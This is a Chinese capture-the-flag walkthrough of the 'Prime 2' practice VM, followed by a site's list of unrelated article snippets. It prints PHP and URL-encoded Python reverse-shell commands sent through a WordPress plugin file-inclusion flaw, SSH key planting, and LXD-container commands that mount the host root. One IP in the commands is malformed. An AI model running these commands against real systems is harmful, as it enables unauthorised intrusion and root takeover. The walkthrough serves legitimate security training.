Prime (2021): 2

前言

这个靶机有亿点难,收获很多。打靶的时候,前面很顺,到创建ssh公钥之后就一点不会了。

1

01

arp扫描,发现有一个130,再查看端口
在这里插入图片描述
在这里插入图片描述
有22,80,129,445,10123
dirb扫描目录
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这里的something里面有一个jarves,应该是用户名称
在这里插入图片描述
继续找,发现upload里有cmd,应该是利用这里上传shell
在这里插入图片描述

02

/wp有一个wordpress,去搜索知道是一个平台,我们可以用wpscan去扫描wordpress,翻LFI是一个本地文件包含漏洞,不知道怎么利用,看wp要利用这里的https://www.exploit-db.com/exploits/46537/

在这里插入图片描述
打开后,找到这一行
在这里插入图片描述
在这里插入图片描述
发现用户jarves
在这里插入图片描述

/server里有一个zip,去搜索了知道,这是gila cms,没什么用处
初步信息收集完成

2

再进行上传shell操作,因为,上文提到的php文件,我这里用php提权
在这里插入图片描述

php -r ‘$sock=fsockopen(“47.192.168.157.128”,2333);exec(“/bin/sh -i <&3 >&3 2>&3”);’

在这里插入图片描述

我这里失败了,换python试试

192.168.157.130/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=…/…/…/…/…/…/…/…/…/…/home/jarves/upload/shell.php&cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.157.128%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

在这里插入图片描述
再升级shell
在这里插入图片描述

去home目录查看信息,有jarves
在这里插入图片描述
tmp里没有东西可以利用
在这里插入图片描述
查看/var,var目录的详细信息
在这里插入图片描述

查看/var/www
在这里插入图片描述
在这里插入图片描述
找到root的密码:root
我这里想去ssh连接,发现密码不对
在这里插入图片描述

3

剩下的步骤基本是看wp
要先用两个工具smbclient和enum4linux
在这里插入图片描述
在这里插入图片描述
再创建ssh公钥
在这里插入图片描述

在这里插入图片描述
将id_rsa.pub复制到tmp目录下命名位authorized_keys
在这里插入图片描述
将authorized_keys上传到目标主机的.ssh目录下
在这里插入图片描述

然后使用ssh登录到目标主机

4

发现jarves还属于lxd组
在这里插入图片描述

从github下载构建好的Alpine,然后进行执行
在这里插入图片描述
接着我们将生成的文件上传至目标机器

wget http://192.168.157.130:7777/lxd-alpine-builder/alpine-v3.14-x86_64-20240410_1650.tar.gz

接着我们使用lxd进行初始化

​lxd init

在这里插入图片描述
导入镜像

lxc image import ./alpine-v3.14-x86_64-20240410_1650.tar.gz --alias myimage

进入到容器的命令行
在这里插入图片描述

lxc init myimage ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

替换mnt/root目录下的authorized_keys文件
在这里插入图片描述

最后使用ssh连接拿到root权限

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/532952.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

LinuxAndroid: 旋转编码器input输入事件适配(旋转输入)

rk3588s: 旋转编码器input输入事件适配 基于Android 12 kernel-5.10版本 参考文档&#xff1a; https://blog.csdn.net/szembed/article/details/131551950 Linux 输入设备调试详解&#xff08;零基础开发&#xff09;Rotary_Encoder旋转编码器驱动 通用GPIO为例 挂载input输…

废品回收 小程序+APP

用户实名认证、回收员实名认证、后台审核、会员管理、回收员管理、订单管理、提现管理、地图、档案管理。 支持&#xff0c;安卓APP、苹果APP、小程序 流程&#xff1a; 一、用户端下单&#xff0c;地图选择上门位置、填写具体位置、废品名称、预估重量、选择是企业废旧、家…

Netty实现udp服务器

1、TCP与UDP通信协议 网络传输层协议有两种&#xff0c;一种是TCP&#xff0c;另外一种是UDP。 TCP是一种面向连接的协议&#xff0c;提供可靠的数据传输。TCP通过三次握手建立连接&#xff0c;并通过确认和重传机制&#xff0c;保证数据的完整性和可靠性。TCP适用于对数据准…

科技助力输电线安全隐患预警,基于YOLOv5全系列参数【n/s/m/l/x】模型开发构建电力设备场景下输电线安全隐患目标检测预警系统

电力的普及让我们的生活变得更加便利&#xff0c;四通八达的电网连接着生活的方方面面&#xff0c;电力能源主要是依托于庞大复杂的电网电力设备进行传输的&#xff0c;有效地保障电网场景下输电线的安全对于保障我们日常生活所需要的电力有着重要的意义&#xff0c;但是电力设…

Java使用aspose-words实现word文档转pdf

Java使用aspose-words实现word文档转pdf 1.获取转换jar文件并安装到本地maven仓库 aspose-words-15.8.0-jdk16.jar包下载地址&#xff1a;https://zhouquanquan.lanzn.com/b00g257yja 密码:965f 下载aspose-words-15.8.0-jdk16.jar包后&#xff0c;通过maven命令手动安装到本…

HWOD:走方格的方案数

一、自己的解题思路 1、(0,m)和(n,0) (0,m)表示处在棋盘的左边线&#xff0c;此刻能回到原点的路线只有一个&#xff0c;就是一路向上 (n,0)表示处在棋盘的上边线&#xff0c;此刻能回到原点的路线只有一个&#xff0c;就是一路向左 2、(1,1) (1,1)表示只有一个方格&#…

【截至2023年底】语言模型的发展

什么是大语言模型LLM&#xff1f;ChatGPT、LLAMA各自有什么优势&#xff1f; from&#xff1a; https://www.youtube.com/watch?vt6qBKPubEEo github&#xff1a; https://github.com/Mooler0410/LLMsPracticalGuide 来自这篇survey&#xff0c;但据说还在更新&#xff0c;到…

嵌入式ARM版本银河麒麟操作系统V10SP1安装OPenGauss数据库

前言&#xff1a; 官网提供了非常完整的openGauss安装步骤。 https://opengauss.org/zh/download/archive/列举一下个人的使用环境&#xff1a; 麒麟V10 rk3588工控板&#xff08;ARM&#xff09; openGauss-3.0.5&#xff08;极简版&#xff09;浏览一下官网&#xff0c;可以…

dnspy逆向和de4dot脱壳

拿到一个软件&#xff0c;使用dnspy查看&#xff0c;发现反汇编后关键部分的函数名和代码有很多乱码&#xff1a; 这样的函数非常多&#xff0c;要想进一步调试和逆向&#xff0c;就只能在dnspy中看反汇编代码了&#xff0c;而无法看到c#代码&#xff0c;当时的整个逆向过程只剩…

【Linux的进程篇章 - 进程程序替换】

Linux学习笔记---009 Linux之进程程序替换理解1、进程程序替换1.1、先看代码和现象1.2、替换的原理1.3、回顾fork函数的应用 2、使用所有的替换方法&#xff0c;并且认识函数参数的含义2.1、exec*函数族2.2、exec替换自定义的程序 3、进程的替换的execve系统调用函数 Linux之进…

MAC: 自己制作https的ssl证书(自己签发免费ssl证书)(OPENSSL生成SSL自签证书)

MAC: 自己制作https的ssl证书(自己签发免费ssl证书)(OPENSSL生成SSL自签证书) 前言 现在https大行其道, ssl又是必不可少的环节. 今天就教大家用开源工具openssl自己生成ssl证书的文件和私钥 环境 MAC电脑 openssl工具自行搜索安装 正文 1、终端执行命令 //生成rsa私钥&…

蓝桥杯-单片机基础16——利用定时计数中断进行动态数码管的多窗口显示

综合查阅了网络上目前能找到的所有关于此技能的代码&#xff0c;最终找到了下述方式比较可靠&#xff0c;且可以自定义任意显示的数值。 传统采用延时函数的方式实现动态数码管扫描&#xff0c;在题目变复杂时效果总是会不佳&#xff0c;因此在省赛中有必要尝试采用定时计数器中…

Vue2(十五):replace属性、编程式路由导航、缓存路由组件、路由组件独有钩子、路由守卫、history与hash

一、router-link的replace属性 1、作用&#xff1a;控制路由跳转时操作浏览器历史记录的模式 2、浏览器的历史记录有两种写入方式&#xff1a;分别为push和replace&#xff0c;push是追加历史记录&#xff0c;replace是替换当前记录。路由跳转时候默认为push 3、如何开启repla…

数据仓库发展历史与架构演进

从1990年代Bill Inmon提出数据仓库概念后经过四十多的发展&#xff0c;经历了早期的PC时代、互联网时代、移动互联网时代再到当前的云计算时代&#xff0c;但是数据仓库的构建目标基本没有变化&#xff0c;都是为了支持企业或者用户的决策分析&#xff0c;包括运营报表、企业营…

数据结构DAY5--二叉树的概念

树&#xff1a; 概念&#xff1a; 由n个节点组成的有限集&#xff0c;有一个根节点&#xff1b;其他节点只有一个前驱节点&#xff0c;但可以有多个后继节点。(一对多) 叶子节点&#xff08;终端结点&#xff09;&#xff1a;只有前驱结点没有后继结点 非叶子节点&#xff0…

【新增利息宝】最新更新的自动抢单系统V6源码免授权无后门 利息宝/抢单/接单返利/区块链

【新增利息宝V6】免授权无后门自动抢单系统源码/利息宝/抢单/接单返利/区块链 更新日志&#xff1a; Ⅰ、新增利息宝功能&#xff0c;余额转入理财 Ⅱ、优化抢单体验&#xff0c;显示随机倒计时和提示内容 Ⅲ、新增首页和订单页面UI特效 Ⅳ、修复抢单页面回调不能返回原分…

【opencv】示例-ela.cpp JPEG图像的错误等级分析(ELA) 通过分析图像压缩后的差异来检测图像是否被篡改过...

ela_modified.jpg 原始ela_modified压缩后再解压得到compressed_img 差异图像Ela 这段代码的功能是实现JPEG图像的错误等级分析&#xff08;ELA&#xff09;&#xff0c;通过分析图像压缩后的差异来检测图像是否被篡改过。程序会首先读取一张图片&#xff0c;然后对其应用质量…

算法打卡day31

今日任务&#xff1a; 1&#xff09;435.无重叠区间 2&#xff09;763.划分字母区间 3&#xff09;56.合并区间 435.无重叠区间 题目链接&#xff1a;435. 无重叠区间 - 力扣&#xff08;LeetCode&#xff09; 给定一个区间的集合&#xff0c;找到需要移除区间的最小数量&…

自己动手封装axios通用方法并上传至私有npm仓库:详细步骤与实现指南

文章目录 一、构建方法1、api/request.js2、api/requestHandler.js3、api/index.js 二、测试方法1、api/axios.js2、main.js3、app.vue4、vue.config.js5、index.html 三、打包1、配置package.json2、生成库包3、配置发布信息4、发布 四、使用1、安装2、使用 五、维护1、维护和…

AGI的核心对齐问题:能力泛化和急速左转

在解决人工智能对齐&#xff08;alignment&#xff09;的技术挑战时&#xff0c;一个核心问题是确保人工智能系统的行为与人类价值和期望保持一致。 然而&#xff0c;人工智能系统往往在获取更强大的能力时会比在对齐方面更容易实现泛化。换句话说&#xff0c;尽管我们可能能够…